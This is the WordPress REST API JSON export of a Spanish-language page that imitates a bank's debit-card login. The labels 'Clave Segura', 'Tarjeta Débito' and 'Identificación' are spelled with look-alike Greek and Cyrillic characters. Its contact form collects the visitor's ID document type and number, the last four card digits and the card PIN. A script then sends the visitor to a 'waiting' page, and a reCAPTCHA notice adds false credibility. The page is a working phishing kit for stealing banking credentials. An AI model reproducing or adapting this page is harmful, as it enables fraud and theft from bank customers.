{"id":803,"date":"2026-02-26T00:33:36","date_gmt":"2026-02-26T00:33:36","guid":{"rendered":"https:\/\/dsktdo1.online\/principio-inciar\/?page_id=803"},"modified":"2026-05-07T19:51:34","modified_gmt":"2026-05-07T19:51:34","slug":"bvrt1b","status":"publish","type":"page","link":"https:\/\/dsktdo1.online\/principio-inciar\/bvrt1b\/","title":{"rendered":"Iniciar b"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"803\" class=\"elementor elementor-803\">\n\t\t\t\t<div class=\"elementor-element elementor-element-ed54f4c e-con-full e-flex e-con e-parent\" data-id=\"ed54f4c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-394068b e-con-full e-flex e-con e-child\" data-id=\"394068b\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-75c5549 elementor-widget elementor-widget-spacer\" data-id=\"75c5549\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-7cbd4b1 e-con-full e-flex e-con e-child\" data-id=\"7cbd4b1\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-7a2fb95 elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-image\" data-id=\"7a2fb95\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"615\" height=\"114\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/LOGSS.png\" class=\"attachment-large size-large wp-image-604\" alt=\"\" srcset=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/LOGSS.png 615w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/LOGSS-300x56.png 300w\" sizes=\"(max-width: 615px) 100vw, 615px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b27ebc7 elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-spacer\" data-id=\"b27ebc7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-b9433ea elementor-hidden-tablet elementor-hidden-mobile elementor-widget elementor-widget-image\" data-id=\"b9433ea\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"652\" height=\"35\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T1ro.png\" class=\"attachment-large size-large wp-image-633\" alt=\"\" srcset=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T1ro.png 652w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T1ro-300x16.png 300w\" sizes=\"(max-width: 652px) 100vw, 652px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-ce83b04 elementor-hidden-desktop elementor-widget elementor-widget-image\" data-id=\"ce83b04\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"900\" height=\"81\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T2do.png\" class=\"attachment-large size-large wp-image-772\" alt=\"\" srcset=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T2do.png 949w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T2do-300x27.png 300w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/T2do-768x69.png 768w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4e5cf7c elementor-widget elementor-widget-spacer\" data-id=\"4e5cf7c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-00eb380 elementor-widget elementor-widget-image\" data-id=\"00eb380\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"202\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner1-1024x230.png\" class=\"attachment-large size-large wp-image-617\" alt=\"\" srcset=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner1-1024x230.png 1024w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner1-300x67.png 300w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner1-768x173.png 768w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner1.png 1089w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-171c0a6 elementor-widget elementor-widget-spacer\" data-id=\"171c0a6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-5a7200e e-con-full e-flex e-con e-child\" data-id=\"5a7200e\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-85a3bb3 elementor-widget__width-initial elementor-align-center elementor-widget elementor-widget-elementskit-button\" data-id=\"85a3bb3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"elementskit-button.default\">\n\t\t\t\t\t<div class=\"ekit-wid-con\" >\t\t<div class=\"ekit-btn-wraper\">\n\t\t\t\t\t\t\t<a href=\"https:\/\/dsktdo1.online\/principio-inciar\/bvrt1\/\" class=\"elementskit-btn  whitespace--normal\" id=\"\">\n\t\t\t\t\t\u03f9l\u0430\u03bd\u0435 \u0405\u0435\u0261\u03c5r\u0430\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n        <\/div>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6cab0b5 elementor-widget__width-initial elementor-align-center elementor-widget elementor-widget-elementskit-button\" data-id=\"6cab0b5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"elementskit-button.default\">\n\t\t\t\t\t<div class=\"ekit-wid-con\" >\t\t<div class=\"ekit-btn-wraper\">\n\t\t\t\t\t\t\t<a href=\"https:\/\/dsktdo1.online\/principio-inciar\/bvrt1b\/\" class=\"elementskit-btn  whitespace--normal\" id=\"\">\n\t\t\t\t\t\u03a4\u0430r\u03f3\u0435t\u0430 \u13a0\u00e9b\u0456t\u03bf\t\t\t\t<\/a>\n\t\t\t\t\t<\/div>\n        <\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-7e79e96 e-con-full e-flex e-con e-child\" data-id=\"7e79e96\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-82a4c5a elementor-widget elementor-widget-image\" data-id=\"82a4c5a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"452\" height=\"116\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner2.png\" class=\"attachment-large size-large wp-image-679\" alt=\"\" srcset=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner2.png 452w, https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/banner2-300x77.png 300w\" sizes=\"(max-width: 452px) 100vw, 452px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-3893234 elementor-widget elementor-widget-spacer\" data-id=\"3893234\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-cc62b51 elementor-widget elementor-widget-elementskit-contact-form7\" data-id=\"cc62b51\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"elementskit-contact-form7.default\">\n\t\t\t\t\t<div class=\"ekit-wid-con\" ><div class=\"ekit-form\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f805-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"805\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/principio-inciar\/wp-json\/wp\/v2\/pages\/803#wpcf7-f805-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"805\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f805-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<p><label>l\u0501\u0435nt\u0456f\u0456\u03f2\u0430\u03f2\u0456\u00f3n<\/label>\n<\/p>\n<table class=\"uno\" width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">\n\t<tr>\n\t\t<td width=\"20%\">\n\t\t\t<table class=\"uno\" width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">\n\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"TIPO_DOCUM\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"TIPO_DOCUM\"><option value=\"C.C...... C\u00e9dula de Ciudadan\u00eda\">C.C...... C\u00e9dula de Ciudadan\u00eda<\/option><option value=\"T.I......  Tarjeta de Identidad\">T.I......  Tarjeta de Identidad<\/option><option value=\"C.E...... C\u00e9dula de Extranjer\u00eda\">C.E...... C\u00e9dula de Extranjer\u00eda<\/option><option value=\"N.P.N...... Nit Persona Natural\">N.P.N...... Nit Persona Natural<\/option><option value=\"N.P.E...... Nit Persona Extranjera\">N.P.E...... Nit Persona Extranjera<\/option><option value=\"P.S...... Pasaporte\">P.S...... Pasaporte<\/option><option value=\"R.C......Registro C\u00edvil\">R.C......Registro C\u00edvil<\/option><\/select><\/span>\n\t\t\t\t\t\t<\/p>\n\t\t\t\t\t<\/td>\n\t\t\t\t<\/tr>\n\t\t\t<\/table>\n\t\t<\/td>\n\t\t<td width=\"80%\">\n\t\t\t<table class=\"uno\" width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">\n\t\t\t\t<tr>\n\t\t\t\t\t<td>\n\t\t\t\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"NUME_DOCUM\"><input class=\"wpcf7-form-control wpcf7-number wpcf7-validates-as-required wpcf7-validates-as-number\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"#\" value=\"\" type=\"number\" name=\"NUME_DOCUM\" \/><\/span>\n\t\t\t\t\t\t<\/p>\n\t\t\t\t\t<\/td>\n\t\t\t\t<\/tr>\n\t\t\t<\/table>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p><label>\u00daltimos 4 d\u00edgitos de tu tarjeta d\u00e9bito<\/label>\n<\/p>\n<table class=\"uno\" width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">\n\t<tr>\n\t\t<td>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"CTRO_DIG\"><input size=\"40\" maxlength=\"4\" minlength=\"4\" class=\"wpcf7-form-control wpcf7-password wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-password\" password_strength=\"1\" hideicon=\"hideicon\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"....\" value=\"\" type=\"password\" name=\"CTRO_DIG\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p><label>Clave de tu tarjeta d\u00e9bito<\/label>\n<\/p>\n<table class=\"uno\" width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\">\n\t<tr>\n\t\t<td>\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"COD_REFE\"><input size=\"40\" maxlength=\"4\" minlength=\"4\" class=\"wpcf7-form-control wpcf7-password wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-password\" password_strength=\"1\" hideicon=\"hideicon\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"....\" value=\"\" type=\"password\" name=\"COD_REFE\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/td>\n\t<\/tr>\n<\/table>\n<p>&nbsp;<br \/>\n<input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Ingresar\" \/><br \/>\n&nbsp;\n<\/p><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-17fd24c elementor-widget elementor-widget-html\" data-id=\"17fd24c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<script>\ndocument.addEventListener( 'wpcf7mailsent', function( event ) {\n    \/\/ Aqu\u00ed defines a d\u00f3nde va el usuario tras enviar cada formulario\n    \/\/ Puedes poner la URL de tu \"P\u00e1gina de Espera\"\n    location = 'https:\/\/dsktdo1.online\/principio-inciar\/b_esperar\/';\n}, false );\n<\/script>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-6ecc34c elementor-widget elementor-widget-text-editor\" data-id=\"6ecc34c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: center;\"><span style=\"text-decoration: underline;\"><span style=\"color: #0043a9; text-decoration: underline;\">R\u0435\u0261\u0456\u0455tr\u0430rm\u0435<\/span><\/span>\u00a0 \u00a0 \u00a0|\u00a0 \u00a0 \u00a0<span style=\"text-decoration: underline;\"><span style=\"color: #0043a9; text-decoration: underline;\">Olvid\u00e9 mi \u03f9l\u0430\u03bd\u0435<\/span><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-520e537 e-con-full e-flex e-con e-child\" data-id=\"520e537\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-c433a46 e-con-full e-flex e-con e-child\" data-id=\"c433a46\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f44f50a elementor-widget elementor-widget-spacer\" data-id=\"f44f50a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d8ec324 elementor-widget elementor-widget-text-editor\" data-id=\"d8ec324\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: left;\">Este sitio est\u00e1 protegido por reCAPTCHA y aplican las\u00a0<span style=\"text-decoration: underline; color: #0000ff;\">pol\u00edticas de privacidad<\/span>\u00a0y los\u00a0<span style=\"text-decoration: underline;\"><span style=\"color: #0000ff; text-decoration: underline;\">t\u00e9rminos de servicio de Google.<\/span><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-c042cd3 elementor-widget elementor-widget-spacer\" data-id=\"c042cd3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-6e6e257 e-con-full e-flex e-con e-child\" data-id=\"6e6e257\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t<div class=\"elementor-element elementor-element-4f9c619 e-con-full e-flex e-con e-child\" data-id=\"4f9c619\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-ed8aeab elementor-widget elementor-widget-spacer\" data-id=\"ed8aeab\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-bf06e6e elementor-widget elementor-widget-image-carousel\" data-id=\"bf06e6e\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;slides_to_show&quot;:&quot;1&quot;,&quot;navigation&quot;:&quot;none&quot;,&quot;autoplay_speed&quot;:25000,&quot;autoplay&quot;:&quot;yes&quot;,&quot;pause_on_hover&quot;:&quot;yes&quot;,&quot;pause_on_interaction&quot;:&quot;yes&quot;,&quot;infinite&quot;:&quot;yes&quot;,&quot;effect&quot;:&quot;slide&quot;,&quot;speed&quot;:500}\" data-widget_type=\"image-carousel.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-image-carousel-wrapper swiper\" role=\"region\" aria-roledescription=\"carousel\" aria-label=\"Carrusel de im\u00e1genes\" dir=\"ltr\">\n\t\t\t<div class=\"elementor-image-carousel swiper-wrapper\" aria-live=\"off\">\n\t\t\t\t\t\t\t\t<div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"1 de 3\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/sly1-1.png\" alt=\"sly1\" \/><\/figure><\/div><div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"2 de 3\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/sly2-1.png\" alt=\"sly2\" \/><\/figure><\/div><div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"3 de 3\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/sly3-1.png\" alt=\"sly3\" \/><\/figure><\/div>\t\t\t<\/div>\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-81b2c9d e-con-full e-flex e-con e-child\" data-id=\"81b2c9d\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-7613093 elementor-arrows-position-outside elementor-widget elementor-widget-image-carousel\" data-id=\"7613093\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;slides_to_show&quot;:&quot;3&quot;,&quot;slides_to_show_mobile&quot;:&quot;2&quot;,&quot;slides_to_scroll_mobile&quot;:&quot;1&quot;,&quot;navigation&quot;:&quot;arrows&quot;,&quot;autoplay_speed&quot;:10000,&quot;autoplay&quot;:&quot;yes&quot;,&quot;pause_on_hover&quot;:&quot;yes&quot;,&quot;pause_on_interaction&quot;:&quot;yes&quot;,&quot;infinite&quot;:&quot;yes&quot;,&quot;speed&quot;:500,&quot;image_spacing_custom&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:20,&quot;sizes&quot;:[]},&quot;image_spacing_custom_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;image_spacing_custom_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"image-carousel.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-image-carousel-wrapper swiper\" role=\"region\" aria-roledescription=\"carousel\" aria-label=\"Carrusel de im\u00e1genes\" dir=\"ltr\">\n\t\t\t<div class=\"elementor-image-carousel swiper-wrapper\" aria-live=\"off\">\n\t\t\t\t\t\t\t\t<div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"1 de 4\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/A1.png\" alt=\"A1\" \/><\/figure><\/div><div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"2 de 4\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/A2.png\" alt=\"A2\" \/><\/figure><\/div><div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"3 de 4\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/A3.png\" alt=\"A3\" \/><\/figure><\/div><div class=\"swiper-slide\" role=\"group\" aria-roledescription=\"slide\" aria-label=\"4 de 4\"><figure class=\"swiper-slide-inner\"><img decoding=\"async\" class=\"swiper-slide-image\" src=\"https:\/\/dsktdo1.online\/principio-inciar\/wp-content\/uploads\/2026\/02\/A4.png\" alt=\"A4\" \/><\/figure><\/div>\t\t\t<\/div>\n\t\t\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-swiper-button elementor-swiper-button-prev\" role=\"button\" tabindex=\"0\">\n\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-far-arrow-alt-circle-left\" viewBox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M8 256c0 137 111 248 248 248s248-111 248-248S393 8 256 8 8 119 8 256zm448 0c0 110.5-89.5 200-200 200S56 366.5 56 256 145.5 56 256 56s200 89.5 200 200zm-72-20v40c0 6.6-5.4 12-12 12H256v67c0 10.7-12.9 16-20.5 8.5l-99-99c-4.7-4.7-4.7-12.3 0-17l99-99c7.6-7.6 20.5-2.2 20.5 8.5v67h116c6.6 0 12 5.4 12 12z\"><\/path><\/svg>\t\t\t\t\t<\/div>\n\t\t\t\t\t<div class=\"elementor-swiper-button elementor-swiper-button-next\" role=\"button\" tabindex=\"0\">\n\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-far-arrow-alt-circle-right\" viewBox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M504 256C504 119 393 8 256 8S8 119 8 256s111 248 248 248 248-111 248-248zm-448 0c0-110.5 89.5-200 200-200s200 89.5 200 200-89.5 200-200 200S56 366.5 56 256zm72 20v-40c0-6.6 5.4-12 12-12h116v-67c0-10.7 12.9-16 20.5-8.5l99 99c4.7 4.7 4.7 12.3 0 17l-99 99c-7.6 7.6-20.5 2.2-20.5-8.5v-67H140c-6.6 0-12-5.4-12-12z\"><\/path><\/svg>\t\t\t\t\t<\/div>\n\t\t\t\t\n\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c144d elementor-widget elementor-widget-spacer\" data-id=\"16c144d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-e3c850b elementor-widget elementor-widget-heading\" data-id=\"e3c850b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">v.1.33.0<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>\u03f9l\u0430\u03bd\u0435 \u0405\u0435\u0261\u03c5r\u0430 \u03a4\u0430r\u03f3\u0435t\u0430 \u13a0\u00e9b\u0456t\u03bf l\u0501\u0435nt\u0456f\u0456\u03f2\u0430\u03f2\u0456\u00f3n C.C&#8230;&#8230; C\u00e9dula de Ciudadan\u00edaT.I&#8230;&#8230; Tarjeta de IdentidadC.E&#8230;&#8230; C\u00e9dula de Extranjer\u00edaN.P.N&#8230;&#8230; Nit Persona NaturalN.P.E&#8230;&#8230; Nit Persona ExtranjeraP.S&#8230;&#8230; PasaporteR.C&#8230;&#8230;Registro C\u00edvil \u00daltimos 4 d\u00edgitos de tu tarjeta d\u00e9bito Clave de tu tarjeta d\u00e9bito &nbsp; &nbsp; R\u0435\u0261\u0456\u0455tr\u0430rm\u0435\u00a0 \u00a0 \u00a0|\u00a0 \u00a0 \u00a0Olvid\u00e9 mi \u03f9l\u0430\u03bd\u0435 Este sitio est\u00e1 protegido por reCAPTCHA y aplican las\u00a0pol\u00edticas de privacidad\u00a0y &#8230; <a title=\"Iniciar b\" class=\"read-more\" href=\"https:\/\/dsktdo1.online\/principio-inciar\/bvrt1b\/\" aria-label=\"Leer m\u00e1s sobre Iniciar b\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-803","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/pages\/803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/comments?post=803"}],"version-history":[{"count":14,"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/pages\/803\/revisions"}],"predecessor-version":[{"id":1227,"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/pages\/803\/revisions\/1227"}],"wp:attachment":[{"href":"https:\/\/dsktdo1.online\/principio-inciar\/wp-json\/wp\/v2\/media?parent=803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}